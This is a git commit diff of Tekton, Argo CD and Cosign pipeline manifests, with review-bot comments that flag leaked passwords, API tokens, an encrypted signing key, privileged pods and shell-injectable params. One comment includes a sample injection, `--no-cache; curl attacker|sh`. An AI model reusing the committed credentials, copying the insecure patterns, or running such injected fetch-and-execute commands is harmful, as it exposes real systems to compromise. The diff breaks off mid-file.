initial commit

This commit is contained in:
allard
2025-11-23 18:58:51 +01:00
commit 376a944abc
1553 changed files with 314731 additions and 0 deletions


@@ -0,0 +1,18 @@
apiVersion: argoproj.io/v1alpha1
kind: AppProject
metadata:
name: default
namespace: argocd
spec:
description: Default project
destinations:
- namespace: '*'
server: https://kubernetes.default.svc
sourceRepos:
- '*'
clusterResourceWhitelist:
- group: '*'
kind: '*'
namespaceResourceBlacklist:
- group: backstage.io
kind: Component
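Review bot: The `default` AppProject grants every application in it any source repository, any destination namespace and every cluster-scoped resource kind (`sourceRepos: '*'`, `destinations.namespace: '*'`, `clusterResourceWhitelist` group/kind `'*'`), so whoever holds the Tekton credential used to sync — or write access to any Git repo — can create ClusterRoleBindings or modify cluster-wide objects through Argo CD. Restrict `sourceRepos` to the Gitea repositories actually deployed, enumerate the target namespaces, and drop `clusterResourceWhitelist` unless cluster-scoped kinds are genuinely needed (then list only those). The single `namespaceResourceBlacklist` entry for `backstage.io/Component` does not materially reduce that blast radius.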


@@ -0,0 +1,7 @@
apiVersion: v1
kind: ConfigMap
metadata:
name: argocd-env-configmap
namespace: default
data:
ARGOCD_SERVER: argocd-dev.allarddcs.nl


@@ -0,0 +1,10 @@
apiVersion: tekton.dev/v1beta1
kind: PipelineRun
metadata:
generateName: argocd-pipeline-run-
spec:
pipelineRef:
name: argocd-pipeline-test
params:
- name: sonar-project-key
value: olproperties


@@ -0,0 +1,19 @@
apiVersion: tekton.dev/v1beta1
kind: Pipeline
metadata:
name: argocd-pipeline-test
spec:
description: |
This pipeline tests argocd
params:
- name: sonar-project-key
type: string
tasks:
- name: deploy-with-argocd
taskref:
name: argocd-task-sync-and-wait
params:
- name: application-name
value: $(params.sonar-project-key)
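Review bot: `taskref` on the `deploy-with-argocd` task is lowercase; Tekton's field is `taskRef`, so depending on how unknown fields are handled this is either rejected outright or yields a task with neither `taskRef` nor `taskSpec`, which validation refuses. Change it to `taskRef:`. The Argo CD application name is also derived from `sonar-project-key`, which couples two unrelated identifiers — a dedicated `application-name` pipeline param would make the intent clear.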


@@ -0,0 +1,43 @@
apiVersion: tekton.dev/v1
kind: Task
metadata:
name: argocd-task-sync-and-wait
namespace: default
spec:
description: |-
This task syncs (deploys) an Argo CD application and waits for it to be healthy.
To do so, it requires the address of the Argo CD server and some form of authentication either a username/password or an authentication token.
params:
- description: name of the application to sync
name: application-name
type: string
- default: HEAD
description: the revision to sync to
name: revision
type: string
- default: --
name: flags
type: string
- default: v2.2.2
name: argocd-version
type: string
stepTemplate:
computeResources: {}
envFrom:
- configMapRef:
name: argocd-env-configmap
- secretRef:
name: argocd-env-secret
steps:
- computeResources: {}
image: argoproj/argocd
name: login
script: |
echo "ARGOCD_SERVER = " $ARGOCD_SERVER
echo "ARGOCD_USERNAME = " $ARGOCD_USERNAME
echo "ARGOCD_PASSWORD = " $ARGOCD_PASSWORD
if [ -z "$ARGOCD_AUTH_TOKEN" ]; then
yes | argocd login "$ARGOCD_SERVER" --username="$ARGOCD_USERNAME" --password="$ARGOCD_PASSWORD";
fi
argocd app sync "$(params.application-name)" --revision "$(params.revision)" "$(params.flags)"
argocd app wait "$(params.application-name)" --health "$(params.flags)"
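Review bot: The `login` step prints the admin credential to the step log at `echo "ARGOCD_PASSWORD = " $ARGOCD_PASSWORD`, so it ends up in pod logs and any log shipper; delete that line (and the username echo). `yes | argocd login` auto-answers the certificate prompt, silently accepting whatever certificate the server presents — mount the CA (or use a trusted certificate) and drop the `yes`. The step image `argoproj/argocd` floats on `latest` and ignores the declared `argocd-version` param; use `image: argoproj/argocd:$(params.argocd-version)` (ideally a digest) so the CLI version is pinned. The `flags` param defaulting to `--` is passed unquoted-as-text into both `argocd app sync` and `argocd app wait`, so a param value is effectively shell code.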


@@ -0,0 +1,3 @@
microk8s kubectl create secret generic argocd-env-secret \
--from-literal=ARGOCD_USERNAME=admin \
--from-literal=ARGOCD_PASSWORD='Argocd01@'
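Review bot: The Argo CD `admin` password `Argocd01@` is committed in clear text in this script; treat it as leaked, rotate it, and keep literals out of the script (`--from-literal=ARGOCD_PASSWORD="$ARGOCD_PASSWORD"` from the environment, or `--from-file` from an untracked file). The pipeline does not need the built-in `admin` account either: create a dedicated local user or project role with only `applications, sync/get` on the relevant project and store its token as `ARGOCD_AUTH_TOKEN`, which the `argocd-task-sync-and-wait` Task in this commit already honours. Consider SealedSecrets/External Secrets so the Secret is reproducible from Git without its value.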


@@ -0,0 +1,18 @@
apiVersion: argoproj.io/v1alpha1
kind: AppProject
metadata:
name: default
namespace: argocd
spec:
description: Default project
destinations:
- namespace: '*' # Allow all namespaces
server: https://kubernetes.default.svc
sourceRepos:
- '*' # Allow all repositories
clusterResourceWhitelist:
- group: '*' # Allow all cluster-scoped resources
kind: '*'
namespaceResourceBlacklist:
- group: backstage.io # Exclude all Backstage API group
kind: Component # Exclude Component kind
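Review bot: This second copy of the `default` AppProject carries the same wildcard grants as the other one in this commit — any repo, any namespace, every cluster-scoped kind — and the inline comments document the policy rather than narrow it. Keep a single copy of the manifest and tighten it: list the real `sourceRepos`, enumerate destination namespaces, and remove `clusterResourceWhitelist` unless this project really deploys cluster-scoped resources.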


@@ -0,0 +1,64 @@
apiVersion: tekton.dev/v1
kind: Task
metadata:
name: argocd-sync-or-deploy
namespace: default
spec:
params:
- name: appName
type: string
description: The name of the ArgoCD application
- name: appRepoURL
type: string
description: The Git repository URL for the ArgoCD application
- name: appRepoRevision
type: string
description: The Git repository revision (e.g., branch, tag)
- name: appPath
type: string
description: The path to the ArgoCD application manifests in the Git repository
- name: argocdServer
type: string
description: The ArgoCD server URL
- name: argocdUsername
type: string
description: The ArgoCD username for authentication
- name: argocdPassword
type: string
description: The ArgoCD password for authentication
stepTemplate:
computeResources: {}
envFrom:
- configMapRef:
name: argocd-env-configmap
- secretRef:
name: argocd-env-secret
steps:
- name: sync-argocd-app
image: quay.io/argoproj/argocd-cli:v2.8.3
script: |
#!/bin/bash
echo "ARGOCD_SERVER = " $ARGOCD_SERVER
echo "ARGOCD_USERNAME = " $ARGOCD_USERNAME
echo "ARGOCD_PASSWORD = " $ARGOCD_PASSWORD
# Login to ArgoCD
argocd login $(params.argocdServer) --username $(params.argocdUsername) --password $(params.argocdPassword) --insecure
# Check if the application already exists
if argocd app list | grep -q $(params.appName); then
echo "Application $(params.appName) exists. Updating the application..."
# Sync the existing application to update
argocd app sync $(params.appName) --revision $(params.appRepoRevision) --insecure
else
echo "Application $(params.appName) does not exist. Creating a new application..."
# Create a new application if it doesn't exist
argocd app create $(params.appName) \
--repo $(params.appRepoURL) \
--revision $(params.appRepoRevision) \
--path $(params.appPath) \
--dest-server https://kubernetes.default.svc \
--dest-namespace default \
--insecure
fi
workspaces:
- name: source-dir
optional: true
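Review bot: `argocdPassword` is a plain Task param and is additionally echoed (`echo "ARGOCD_PASSWORD = " $ARGOCD_PASSWORD`); param values are persisted in the TaskRun/PipelineRun objects and shown by `tkn`, so the credential is exposed both in logs and via the API. Take the credential only from the `argocd-env-secret` already mounted through `envFrom` (`argocd login "$ARGOCD_SERVER" --username "$ARGOCD_USERNAME" --password "$ARGOCD_PASSWORD"`), drop the three echo lines and the `argocdUsername`/`argocdPassword` params. `--insecure` disables TLS verification towards the Argo CD API; mount the CA instead. `argocd app list | grep -q $(params.appName)` is a substring match, so an existing `olproperties-test` would make a new `olproperties` wrongly take the sync branch — use `argocd app get "$(params.appName)" >/dev/null 2>&1` as the existence test.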


@@ -0,0 +1,106 @@
apiVersion: tekton.dev/v1
kind: Task
metadata:
annotations:
kubectl.kubernetes.io/last-applied-configuration: |
{"apiVersion":"tekton.dev/v1beta1","kind":"Task","metadata":{"annotations":{"tekton.dev/categories":"Image Build","tekton.dev/pipelines.minVersion":"0.17.0","tekton.dev/platforms":"linux/amd64,linux/s390x,linux/ppc64le,linux/arm64","tekton.dev/tags":"image-build"},"labels":{"app.kubernetes.io/version":"0.5"},"name":"buildah","namespace":"default"},"spec":{"description":"Buildah task builds source into a container image and then pushes it to a container registry.\nBuildah Task builds source into a container image using Project Atomic's Buildah build tool.It uses Buildah's support for building from Dockerfiles, using its buildah bud command.This command executes the directives in the Dockerfile to assemble a container image, then pushes that image to a container registry.","params":[{"description":"Reference of the image buildah will produce.","name":"IMAGE"},{"default":"quay.io/buildah/stable:v1.23.3","description":"The location of the buildah builder image.","name":"BUILDER_IMAGE"},{"default":"overlay","description":"Set buildah storage driver","name":"STORAGE_DRIVER"},{"default":"./Dockerfile","description":"Path to the Dockerfile to build.","name":"DOCKERFILE"},{"default":".","description":"Path to the directory to use as context.","name":"CONTEXT"},{"default":"true","description":"Verify the TLS on the registry endpoint (for push/pull to a non-TLS registry)","name":"TLSVERIFY"},{"default":"oci","description":"The format of the built container, oci or docker","name":"FORMAT"},{"default":"","description":"Extra parameters passed for the build command when building images.","name":"BUILD_EXTRA_ARGS"},{"default":"","description":"Extra parameters passed for the push command when pushing images.","name":"PUSH_EXTRA_ARGS","type":"string"},{"default":"false","description":"Skip pushing the built image","name":"SKIP_PUSH"}],"results":[{"description":"Digest of the image just built.","name":"IMAGE_DIGEST"},{"description":"Image repository where the built image would be 
pushed to","name":"IMAGE_URL"}],"steps":[{"image":"$(params.BUILDER_IMAGE)","name":"build","script":"[[ \"$(workspaces.sslcertdir.bound)\" == \"true\" ]] \u0026\u0026 CERT_DIR_FLAG=\"--cert-dir $(workspaces.sslcertdir.path)\"\n[[ \"$(workspaces.dockerconfig.bound)\" == \"true\" ]] \u0026\u0026 export DOCKER_CONFIG=\"$(workspaces.dockerconfig.path)\"\nbuildah ${CERT_DIR_FLAG} --storage-driver=$(params.STORAGE_DRIVER) bud \\\n $(params.BUILD_EXTRA_ARGS) --format=$(params.FORMAT) \\\n --tls-verify=$(params.TLSVERIFY) --no-cache \\\n -f $(params.DOCKERFILE) -t $(params.IMAGE) $(params.CONTEXT)\n[[ \"$(params.SKIP_PUSH)\" == \"true\" ]] \u0026\u0026 echo \"Push skipped\" \u0026\u0026 exit 0\nbuildah ${CERT_DIR_FLAG} --storage-driver=$(params.STORAGE_DRIVER) push \\\n $(params.PUSH_EXTRA_ARGS) --tls-verify=$(params.TLSVERIFY) \\\n --digestfile /tmp/image-digest $(params.IMAGE) \\\n docker://$(params.IMAGE)\ncat /tmp/image-digest | tee $(results.IMAGE_DIGEST.path)\necho -n \"$(params.IMAGE)\" | tee $(results.IMAGE_URL.path)\n","securityContext":{"privileged":true},"volumeMounts":[{"mountPath":"/var/lib/containers","name":"varlibcontainers"}],"workingDir":"$(workspaces.source.path)"}],"volumes":[{"emptyDir":{},"name":"varlibcontainers"}],"workspaces":[{"name":"source"},{"name":"sslcertdir","optional":true},{"description":"An optional workspace that allows providing a .docker/config.json file for Buildah to access the container registry. The file should be placed at the root of the Workspace with name config.json.","name":"dockerconfig","optional":true}]}}
tekton.dev/categories: Image Build
tekton.dev/pipelines.minVersion: 0.17.0
tekton.dev/platforms: linux/amd64,linux/s390x,linux/ppc64le,linux/arm64
tekton.dev/tags: image-build
creationTimestamp: "2024-02-28T10:37:30Z"
generation: 1
labels:
app.kubernetes.io/version: "0.5"
name: buildah
namespace: default
resourceVersion: "670600"
uid: be7a4925-c0ff-4397-8056-2842f9844108
spec:
description: |-
Buildah task builds source into a container image and then pushes it to a container registry.
Buildah Task builds source into a container image using Project Atomic's Buildah build tool.It uses Buildah's support for building from Dockerfiles, using its buildah bud command.This command executes the directives in the Dockerfile to assemble a container image, then pushes that image to a container registry.
params:
- description: Reference of the image buildah will produce.
name: IMAGE
type: string
- default: quay.io/buildah/stable:v1.23.3
description: The location of the buildah builder image.
name: BUILDER_IMAGE
type: string
- default: overlay
description: Set buildah storage driver
name: STORAGE_DRIVER
type: string
- default: ./Dockerfile
description: Path to the Dockerfile to build.
name: DOCKERFILE
type: string
- default: .
description: Path to the directory to use as context.
name: CONTEXT
type: string
- default: "true"
description: Verify the TLS on the registry endpoint (for push/pull to a non-TLS
registry)
name: TLSVERIFY
type: string
- default: oci
description: The format of the built container, oci or docker
name: FORMAT
type: string
- default: ""
description: Extra parameters passed for the build command when building images.
name: BUILD_EXTRA_ARGS
type: string
- default: ""
description: Extra parameters passed for the push command when pushing images.
name: PUSH_EXTRA_ARGS
type: string
- default: "false"
description: Skip pushing the built image
name: SKIP_PUSH
type: string
results:
- description: Digest of the image just built.
name: IMAGE_DIGEST
type: string
- description: Image repository where the built image would be pushed to
name: IMAGE_URL
type: string
steps:
- computeResources: {}
image: $(params.BUILDER_IMAGE)
name: build
script: |
[[ "$(workspaces.sslcertdir.bound)" == "true" ]] && CERT_DIR_FLAG="--cert-dir $(workspaces.sslcertdir.path)"
[[ "$(workspaces.dockerconfig.bound)" == "true" ]] && export DOCKER_CONFIG="$(workspaces.dockerconfig.path)"
buildah ${CERT_DIR_FLAG} --storage-driver=$(params.STORAGE_DRIVER) bud \
$(params.BUILD_EXTRA_ARGS) --format=$(params.FORMAT) \
--tls-verify=$(params.TLSVERIFY) --no-cache \
-f $(params.DOCKERFILE) -t $(params.IMAGE) $(params.CONTEXT)
[[ "$(params.SKIP_PUSH)" == "true" ]] && echo "Push skipped" && exit 0
buildah ${CERT_DIR_FLAG} --storage-driver=$(params.STORAGE_DRIVER) push \
$(params.PUSH_EXTRA_ARGS) --tls-verify=$(params.TLSVERIFY) \
--digestfile /tmp/image-digest $(params.IMAGE) \
docker://$(params.IMAGE)
cat /tmp/image-digest | tee $(results.IMAGE_DIGEST.path)
echo -n "$(params.IMAGE)" | tee $(results.IMAGE_URL.path)
securityContext:
privileged: true
volumeMounts:
- mountPath: /var/lib/containers
name: varlibcontainers
workingDir: $(workspaces.source.path)
volumes:
- emptyDir: {}
name: varlibcontainers
workspaces:
- name: source
- name: sslcertdir
optional: true
- description: An optional workspace that allows providing a .docker/config.json
file for Buildah to access the container registry. The file should be placed
at the root of the Workspace with name config.json.
name: dockerconfig
optional: true
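Review bot: This Task is an exported live object — `resourceVersion`, `uid`, `creationTimestamp`, `generation` and the `kubectl.kubernetes.io/last-applied-configuration` annotation should be stripped before committing, since `kubectl apply` with a stale `resourceVersion` fails with a conflict and the annotation duplicates the entire spec. The `build` step runs `privileged: true`; if rootless buildah with `--isolation chroot` (plus a `/dev/fuse` device for overlay) works on this cluster, prefer it, otherwise schedule builds on an isolated node pool and say so in the Task description. `$(params.BUILD_EXTRA_ARGS)`, `$(params.PUSH_EXTRA_ARGS)` and `$(params.IMAGE)` are substituted as text into the shell script, so a param value such as `--no-cache; curl attacker|sh` executes — pass params through `env:` and reference them quoted (`"$IMAGE"`) inside `script`.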


@@ -0,0 +1,73 @@
apiVersion: tekton.dev/v1beta1
kind: PipelineRun
metadata:
generateName: cosign-pipeline-run-
spec:
pipelineRef:
name: cosign-pipeline
#gitea:
params:
- name: repo-url
value: http://gitea.gitea.svc.cluster.local:3000/allard/olproperties.git
- name: git-revision
value: 1.3
#maven:
- name: maven-mirror-url
value: 'http://nexus.nexus.svc.cluster.local:8081/repository/maven-public/'
#sonarqube:
- name: sonar-organization
value: "allarddcs"
- name: sonar-project-key
value: olproperties
- name: sonar-token
value: sqp_214ee7c92e1b82b0d43dd9b1d9462eac8f50434c
- name: sonar-host-url
value: "https://sonarqube-dev.allarddcs.nl"
- name: source-to-scan
value: ./src
#push-to-harbor:
- name: registry
value: harbor-dev.allarddcs.nl
- name: project
value: allard
- name: image-name
value: olproperties
#cosign
- name: cosign-image-url
value: harbor-dev.allarddcs.nl/allard/olproperties
#dependency-track
- name: deptrack-apiKey
value: odt_BRpq4el8T0XqdeunYMnefniaS0n8Yxd8
- name: deptrack-projectName
value: olproperties
- name: deptrack-projectVersion
value: 1.1
- name: deptrack-url
value: https://deptracka-dev.allarddcs.nl
workspaces:
- name: shared-data
volumeClaimTemplate:
spec:
accessModes:
- ReadWriteOnce
resources:
requests:
storage: 1Gi
- name: maven-settings
persistentVolumeClaim:
emptyDir: {}
- name: sonar-settings
configmap:
name: sonar-properties
- name: registry-credentials
secret:
secretName: registry-credentials
items:
- key: .dockerconfigjson
path: config.json
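Review bot: Two live credentials are committed in this PipelineRun — the SonarQube token at `value: sqp_214ee...` and the Dependency-Track API key at `value: odt_BRpq...`; both must be revoked and re-issued, and supplied to the consuming Task from a Secret (a Secret-backed workspace or an `env` with `valueFrom.secretKeyRef`) rather than as params, which are persisted in the run's spec and status. The `maven-settings` workspace binding is malformed: `emptyDir: {}` is nested under `persistentVolumeClaim` instead of being the binding itself; it should read `- name: maven-settings` followed by `emptyDir: {}` at the same level as `name`. Of the params passed here, the `cosign-pipeline` in this commit only references `registry`, `project`, `image-name` and `git-revision`.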


@@ -0,0 +1,64 @@
apiVersion: tekton.dev/v1beta1
kind: Pipeline
metadata:
name: cosign-pipeline
spec:
description: |
This pipeline clones a git repo, builds a Docker image with Kaniko and
pushes it to a registry
params:
- name: repo-url
type: string
- name: git-revision
type: string
- name: maven-mirror-url
type: string
- name: sonar-organization
type: string
- name: sonar-project-key
type: string
- name: sonar-token
type: string
- name: sonar-host-url
type: string
- name: source-to-scan
type: string
- name: registry
type: string
- name: project
type: string
- name: image-name
type: string
- name: cosign-image-url
type: string
- name: deptrack-projectName
type: string
- name: deptrack-projectVersion
type: string
- name: deptrack-apiKey
type: string
- name: deptrack-url
type: string
workspaces:
- name: shared-data
- name: registry-credentials
- name: maven-settings
- name: sonar-settings
tasks:
- name: cosign-sign
taskRef:
name: cosign-sign
params:
- name: cosign-image-url
value: $(params.registry)/$(params.project)/$(params.image-name):$(params.git-revision)
- name: cosign-image-digest
value: sha256:bfb0a7c2b8960ec9a1f61df004bfea8826ab9bf95454368aead0acce929654a4
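Review bot: `cosign-image-digest` is the hard-coded literal `sha256:bfb0a7c2...`, so every run signs the same historical image regardless of what `git-revision` points at, and the tag built into `cosign-image-url` may not even resolve to that digest; a signature that does not attest the artifact just built is worse than none, because verifiers will trust it. Wire the digest from the build task's result — the buildah Task in this commit emits `IMAGE_DIGEST` — e.g. `value: $(tasks.build-image.results.IMAGE_DIGEST)` together with a `runAfter` on that task. The description still says the pipeline clones and builds with Kaniko, but `cosign-sign` is the only task, and twelve of the declared params are never referenced.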


@@ -0,0 +1,18 @@
apiVersion: tekton.dev/v1beta1
kind: PipelineRun
metadata:
generateName: cosign-pipeline-run-
spec:
pipelineRef:
name: cosign-sign-pipeline # This refers to your pipeline defined earlier
params:
- name: image
value: "harbor-dev.allarddcs.nl/allard/olproperties:1.3"
- name: cosign-password
valueFrom:
secretKeyRef:
name: cosign-password-secret
key: password
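Review bot: `valueFrom.secretKeyRef` is not an accepted form for PipelineRun `params` — Tekton params carry a plain `value`, so the admission webhook rejects this run; feed the passphrase to the step as an `env` with `valueFrom.secretKeyRef` in the Task spec instead (the `cosign-sign` Task in this commit hard-codes `COSIGN_PASSWORD`, which is the other half of this problem). The referenced `cosign-sign-pipeline` declares only an `image` param, so `cosign-password` would also be rejected as undeclared. `generateName: cosign-pipeline-run-` collides with the other PipelineRun in this commit, making runs of the two pipelines indistinguishable by name.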


@@ -0,0 +1,15 @@
apiVersion: tekton.dev/v1beta1
kind: Pipeline
metadata:
name: cosign-sign-pipeline
spec:
params:
- name: image
type: string
tasks:
- name: sign-image
taskRef:
name: cosign-sign
params:
- name: image
value: $(params.image)
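Review bot: The `sign-image` task passes a param named `image`, but the `cosign-sign` Task in this commit declares `cosign-image-url` and `cosign-image-digest` (both required, no defaults), so this Pipeline fails validation at run time with missing/extra param errors. Rename the param to `cosign-image-url` and add a `cosign-image-digest` param sourced from a build result rather than a literal — cosign should sign by digest, since a tag such as `olproperties:1.3` can be re-pointed after signing.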


@@ -0,0 +1,69 @@
apiVersion: tekton.dev/v1beta1
kind: Task
metadata:
name: cosign-sign
spec:
params:
- name: cosign-image-url
description: The image to sign (e.g., harbor.example.com/repo/image:tag)
type: string
- name: cosign-image-digest
type: string
steps:
- name: debug
image: busybox
command: [ "sh", "-c" ]
args:
- "cat /root/.docker/config.json"
volumeMounts:
- name: registry-credentials
mountPath: /root/.docker/config.json
subPath: .dockerconfigjson
- name: cosign-sign
# image: ghcr.io/sigstore/cosign:v2.4.1
image: bitnamilegacy/cosign
securityContext:
runAsUser: 0 # Run as root
runAsGroup: 0 # Group ID for root
privileged: true # Allow privileged operations (if needed)
env:
- name: COSIGN_ACCEPT
value: "Y" # Automatically agree to the terms & conditions
- name: COSIGN_PASSWORD
value: "Harbor01@"
script: |
#!/bin/bash
cosign login harbor-dev.allarddcs.nl -u admin -p Harbor01@
set -e
echo "Signing image: $(params.cosign-image-url)"
# Sign the image with Cosign
echo "y" | cosign sign --key /cosign-keys/key $(params.cosign-image-url)@$(params.cosign-image-digest)
volumeMounts:
- name: cosign-key
mountPath: /cosign-keys # Mount the secret at /cosign-keys
- name: registry-credentials
mountPath: /root/.docker/config.json
subPath: .dockerconfigjson
- name: docker-socket
mountPath: /var/run/docker.sock # Mount the Docker socket inside the container
volumes:
- name: cosign-key
secret:
secretName: cosign-key-secret # Secret name for the Cosign key
items:
- key: cosign.key # Key in the secret that holds the Cosign private key
path: key # Path inside the container where the key will be available (i.e., /cosign-keys/key)
- name: registry-credentials
secret:
secretName: registry-credentials # Secret containing Harbor credentials (from the previous step)
items:
- key: .dockerconfigjson # Mount the Docker config to the right place
path: .dockerconfigjson
- name: docker-socket
hostPath:
path: /var/run/docker.sock # Mount the Docker socket
type: Socket
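Review bot: The `debug` step `cat`s `/root/.docker/config.json`, writing the Harbor credentials into the TaskRun log, and the signing step hard-codes `Harbor01@` both as `COSIGN_PASSWORD` and in `cosign login ... -p Harbor01@` (which also runs before `set -e`, so a failed login is ignored); rotate that password and remove both the debug step and the literals. `privileged: true`, `runAsUser: 0` and the `hostPath` mount of `/var/run/docker.sock` hand the pod root on the node, yet cosign only needs registry HTTPS access plus the mounted key and Docker config, so none of them is required. `echo "y" | cosign sign ... $(params.cosign-image-url)@$(params.cosign-image-digest)` expands params as text inside a shell script, so a param value can inject commands. The sketch below drops the shell entirely (the `ghcr.io/sigstore/cosign` image ships no shell, which is likely why it was commented out), reads the passphrase from `cosign-password-secret`, and relies on the mounted `registry-credentials` for authentication; the `docker-socket` volume goes away with it.
```yaml
steps:
  # debug step removed: it printed the registry credentials to the log
  - name: cosign-sign
    image: ghcr.io/sigstore/cosign:v2.4.1  # pin by digest; no shell in this image, so command/args instead of script
    env:
      - name: COSIGN_PASSWORD
        valueFrom:
          secretKeyRef:
            name: cosign-password-secret
            key: password
      - name: DOCKER_CONFIG
        value: /docker
    command: ["cosign"]
    args:
      - sign
      - --yes
      - --key
      - /cosign-keys/key
      - $(params.cosign-image-url)@$(params.cosign-image-digest)
    volumeMounts:
      - name: cosign-key
        mountPath: /cosign-keys
        readOnly: true
      - name: registry-credentials
        mountPath: /docker/config.json
        subPath: .dockerconfigjson
        readOnly: true
# … unchanged: cosign-key and registry-credentials volumes; docker-socket volume removed …
```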


@@ -0,0 +1,11 @@
-----BEGIN ENCRYPTED SIGSTORE PRIVATE KEY-----
eyJrZGYiOnsibmFtZSI6InNjcnlwdCIsInBhcmFtcyI6eyJOIjo2NTUzNiwiciI6
OCwicCI6MX0sInNhbHQiOiJ5c2d3bWNPQUpIKzVyR1h1OFRyZDY4UnpsVkkrZGRM
MnA4cDBpdytaTEY4PSJ9LCJjaXBoZXIiOnsibmFtZSI6Im5hY2wvc2VjcmV0Ym94
Iiwibm9uY2UiOiJjNUtMSyt2YmphbWtWQWs5SFJJcHZpL1BmNlBENW5uZSJ9LCJj
aXBoZXJ0ZXh0IjoiVTVub2ZDLzd1MUtza1dqNWl2TGp4bW1GZ2pseVY1VnZkeGVr
SmE5Ukkvbm1CWk53aHJsWWNUQjBRUGlTMUNlaVh5RGlqZnNNT1d4Tnh0Y3U5akxI
a1BsMnNkNW0wVy91dlJrRmRWRVlFcXFCQWlrbzg3aW9oVkVxWC9CQitvaEd2Rkt0
bWZBTU8yaUtwTm8wRmxieldHaW9sOFlKNHRCZlNZWlFrY055WGF1ait5Z3ovaTJK
NG5tajBRWDM1QlhpQjQwa1ladXhhaDRsRkE9PSJ9
-----END ENCRYPTED SIGSTORE PRIVATE KEY-----
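Review bot: This is the Cosign signing private key committed to the repository; it is scrypt/secretbox-encrypted, but the passphrase is committed in this same commit (`cosign-password-secret ... password=Harbor01@`), so the key is effectively in clear text and anyone with a clone of the history can forge signatures for `harbor-dev.allarddcs.nl/allard/*`. Generate a new key pair (`cosign generate-key-pair`, or better a KMS-backed or keyless flow), re-sign the current images, distribute the new public key to verifiers, and purge this file from history rather than only from HEAD. Add `cosign.key` to `.gitignore` so it cannot be re-added by accident.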


@@ -0,0 +1,4 @@
-----BEGIN PUBLIC KEY-----
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE7PCFjmQqVhO6j6uPMcLrFhEgFSeG
vlpDy1WNaOUie/f40NIfRrA8nusDm5Kj7PF2X+zgGlQbgpjHpJd7iOMG2g==
-----END PUBLIC KEY-----


@@ -0,0 +1,19 @@
apiVersion: v1
kind: Pod
metadata:
name: cosign-debug
spec:
containers:
- name: cosign
image: bitnami/cosign
command: ["sleep", "3600"]
volumeMounts:
- name: cosign-key
mountPath: /cosign
volumes:
- name: cosign-key
secret:
secretName: cosign-key-secret
items:
- key: cosign.key
path: key
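Review bot: This debug Pod mounts the Cosign private key into a long-lived `sleep 3600` container with no `securityContext`, an unpinned `bitnami/cosign` image and no namespace or TTL, so anyone with `pods/exec` in the namespace can read `/cosign/key`. If a debug pod is genuinely needed, pin the image by digest, set `runAsNonRoot` and `readOnlyRootFilesystem`, mount the key with `readOnly: true`, and delete the Pod when done — or keep it out of the repository altogether.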


@@ -0,0 +1 @@
microk8s kubectl create secret generic cosign-key-secret --from-file=cosign.key=/home/ubuntu/containers/kubernetes/tekton/tasks/cosign/cosign.key


@@ -0,0 +1 @@
microk8s kubectl create secret generic cosign-password-secret --from-literal=password=Harbor01@
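Review bot: The Cosign key passphrase `Harbor01@` is committed in clear text here and is the same string used as the Harbor `admin` password in the `cosign-sign` Task, so one leak compromises both the registry and the signing key. Rotate both to distinct values and create the Secret from the environment or an untracked file (`--from-literal=password="$COSIGN_PASSWORD"` or `--from-file=password=./cosign.pass`) rather than from a literal in a committed script.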


@@ -0,0 +1,31 @@
apiVersion: tekton.dev/v1
kind: Task
metadata:
name: curl
spec:
description: This task performs curl operation to transfer data from internet.
params:
- description: URL to curl'ed
name: url
type: string
- default: []
description: options of url
name: options
type: array
- default: docker.io/curlimages/curl:7.72.0@sha256:bd5bbd35f89b867c1dccbc84b8be52f3f74dea20b46c5fe0db3780e040afcb6f
description: option of curl image
name: curl-image
type: string
steps:
- args:
- $(params.options[*])
- $(params.url)
command:
- curl
computeResources: {}
image: $(params.curl-image)
name: curl
workingDir: $(workspaces.source-dir.path)
workspaces:
- name: source-dir
optional: true


@@ -0,0 +1,16 @@
apiVersion: tekton.dev/v1beta1
kind: PipelineRun
metadata:
name: build-and-deploy-pipelinerun-commit-hash
spec:
pipelineRef:
name: build-and-deploy-pipeline
params:
- name: git-repository-url
value: "https://gitea.example.com/yourorg/yourrepo.git"
- name: git-revision
value: "main" # Specify the branch/tag you want to build from
resources:
- name: clone-repo
resourceRef:
name: git-repo-resource # This should be a Tekton Git resource if using Tekton resources
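Review bot: `spec.resources` with `resourceRef` uses PipelineResources, which were deprecated and later removed from Tekton Pipelines (v0.46 onward), so this PipelineRun is rejected on a current installation; hand the checkout to `git-clone` through a workspace instead. The `build-and-deploy-pipeline` in this commit declares no `params`, so `git-repository-url` and `git-revision` would also be rejected as undeclared. The `example.com` placeholders mark this as a template — keep it out of the directory that gets applied.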


@@ -0,0 +1,69 @@
apiVersion: tekton.dev/v1beta1
kind: Pipeline
metadata:
name: build-and-deploy-pipeline
spec:
tasks:
- name: clone-repo
taskRef:
name: git-clone
params:
- name: url
value: "https://gitea.example.com/yourorg/yourrepo.git"
- name: revision
value: "main" # or any branch or tag
- name: get-git-commit-hash
taskSpec:
steps:
- name: get-commit-hash
image: busybox
script: |
#!/bin/sh
# Get the current Git commit hash
COMMIT_HASH=$(git rev-parse --short HEAD)
echo "COMMIT_HASH=$COMMIT_HASH" > $(results.commit-hash.path)
results:
- name: commit-hash
description: The short Git commit hash
- name: build-image
taskRef:
name: kaniko
params:
- name: IMAGE
value: "harbor.example.com/myproject/myapp:$(results.commit-hash.commit-hash)"
- name: CONTEXT
value: "$(resources.clone-repo.results.git-dir)"
- name: DOCKERFILE
value: "$(resources.clone-repo.results.git-dir)/Dockerfile"
- name: REGISTRY
value: "harbor.example.com"
resources:
inputs:
- name: clone-repo
resource: clone-repo
- name: push-image
taskRef:
name: kaniko-push
params:
- name: IMAGE
value: "harbor.example.com/myproject/myapp:$(results.commit-hash.commit-hash)"
- name: REGISTRY
value: "harbor.example.com"
resources:
inputs:
- name: build-image
resource: build-image
- name: trigger-argocd
taskRef:
name: argocd-sync
params:
- name: app-name
value: "myapp"
- name: project
value: "myproject"
- name: sync-options
value: "--prune --retry"
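Review bot: `$(results.commit-hash.commit-hash)` is not a valid reference — a task result is addressed as `$(tasks.get-git-commit-hash.results.commit-hash)` — and the step writes `COMMIT_HASH=<hash>` into the result file, so even once fixed the tag would become `myapp:COMMIT_HASH=abc1234`, which is not a valid OCI tag; write only the hash with `printf '%s' "$COMMIT_HASH" > $(results.commit-hash.path)`. The `get-git-commit-hash` step runs on `busybox`, which has no `git`, and declares no workspace, so there is no checkout for `git rev-parse` to inspect; run it in a git-capable image on the same workspace as `clone-repo`, with `runAfter: [clone-repo]`. `resources.inputs` and `$(resources.clone-repo.results.git-dir)` rely on removed PipelineResources. No task has `runAfter`, so all five would start concurrently.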


@@ -0,0 +1,39 @@
apiVersion: tekton.dev/v1 # or tekton.dev/v1beta1
kind: Task
metadata:
